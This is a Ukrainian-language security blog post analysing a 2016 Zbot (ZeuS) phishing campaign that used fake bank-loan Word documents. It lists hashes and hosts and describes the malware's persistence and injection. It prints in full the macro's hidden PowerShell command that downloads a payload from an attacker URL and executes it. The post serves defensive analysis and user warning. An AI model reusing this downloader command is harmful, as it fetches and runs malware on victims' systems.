Увага! Zbot, чергова хвиля розсилки

Позов_примірник, Угоду_про_видачу_безготівкового, Договір_займу

macro

Вчора близько 15-ї години відбувалася масова розсилка нової модифікації Zbot (ZeuS). З ним ми уже стикалися раніше.

Цього разу фішингові листи містили начеб-то інформацію про непогашений кредит від відомих українських банків:msg2

msg1

І хоча відсутність підписів у корпоративному стилі (!), а головне – скриньки із домену @t-online.de (які не мають відношення до банків) мають насторожити обережного користувача, варто припустити, що частину людей могли ввести в оману. Не важко здогадатися, що не дивлячись на різний зміст листів та різні адреси, начинка документу була однакова. Але про все по порядку:

1)Маркери компрометації:

Received: from mailout09.t-online.de (194.25.134.84) / Received: from mailout05.t-online.de (194.25.134.82)

Документ SHA256=9b4266b05f072a270457198f7212cac0a8fce1ac30d501f214b2a38f20ba6317

dropper SHA256=ba4fe9d9c3138f9ea2caf0d628b0334447d93f301d916f5fdb62dabc115bec5f

payload завантажується звідси hххp://elfaroconsultants.com/safari/content.bin

Типово. що на момент розсилки файли мали дуже низький рейт згідно VirusTotal:

vt2 vt1

oletools красномовно застерігають від необачних кроків:

Screenshot_2016-07-14_16-09-25

2)Механізм активації та компрометації системи:

Якщо жертва відкрила приєднання, то на неї чекатиме прохання активувати макроси. macro2

Так, перед нами уже знайомий тип оболонки – це W97M/Downloader, який містить макрос, що передає інструкції на PowerShell. На відміну від Cerber, приманка якого використовувала base64 обфускацію команд,в даному випадку зловмисники вирішили не витрачати на це часу, тож ми можемо одразу побачити

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();
(New-Object System.Net.WebClient).DownloadFile(‘hххp://elfaroconsultants.com/safari/content.bin’, $f);(New-Object -com WScript.Shell).Exec($f)

Потрібно зазначити іще одну відмінність – запуск коду прив’язаний не до активації макросу, а до закриття файлу. Це новий елемент, раніше мені таке не траплялося.

Отже макрос змушує PowerShell ініціювати завантаження файлу:

netwrk

Завантажений payload зберігається у каталозі %tmp% із довільним іменем і запускається на виконання:

autorun

Після певної затримки payload копіює свої тельбухи у AppData\Locla\ , реєструє себе на автозавантаження та інжектує explorer.exe

inj2

recovery

trapsDLL

За рахунок останнього відбувається самовідновлення файлів вірусу при спробі видалити його елементи із AppData\Local . Не обійшлося і без фірмової “фішки” zbot – при відновленні він генерує новий файл із новим іменем та іншою контрольною сумою.

Продовження аналізу буде трохи згодом.

3) Проміжні висновки

  • Вони (зловмисники) починають приділяти увагу змісту. Варто очікувати нових ідей стосовно боргів/кредитів і таке інше.
  • Звертайте увагу на оформлення листів – які б важливі речі в них не писали, підробку можна відрізнити по оформленню та адресам.
  • Поєднання W97M.downloader + powershell зараз в тренді тому контролюйте мережеву активність даного компоненту.
  • Початкова фаза активації проходить через %temp% проте без .exe
  • Блокувати запуск із %appdata% як раніше потрібно, але в даному випадку вже трохи запізно
  • Для нормального захисту потрібно або вирізати макроси на рівні поштового серверу/шлюзу, або ж застосовувати на кінцевих точках альтернативний захист (не антивірус)
  • Варто готуватися до більш складного та витонченого обману. Ми бачимо, що зловмисники витратили час на підготовку. Наступного разу вони змінять адреси, скопіюють оформлення листів і вже більше людей “на автоматі” відкриють приєднання – питання лише в тому, чи буде активовано макроси (чи там буде щось інше)? Не розслабляйтеся і пам’ятайте, що безпека ваших систем і даних залежить від вас самих.

Будьте уважними та обережними при роботі з ІТ, особливо при роботі з електронними листами.

— Не было количества, вот ведь в чём дело. Одно лишь качество переменилось вдруг. Радикально. В одночасье. Как взрыв.

MV5BMTk1NTc2NjYxNF5BMl5BanBnXkFtZTcwNzA0Njg0Mw@@._V1_SX640_SY720_

VR

Tags: , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: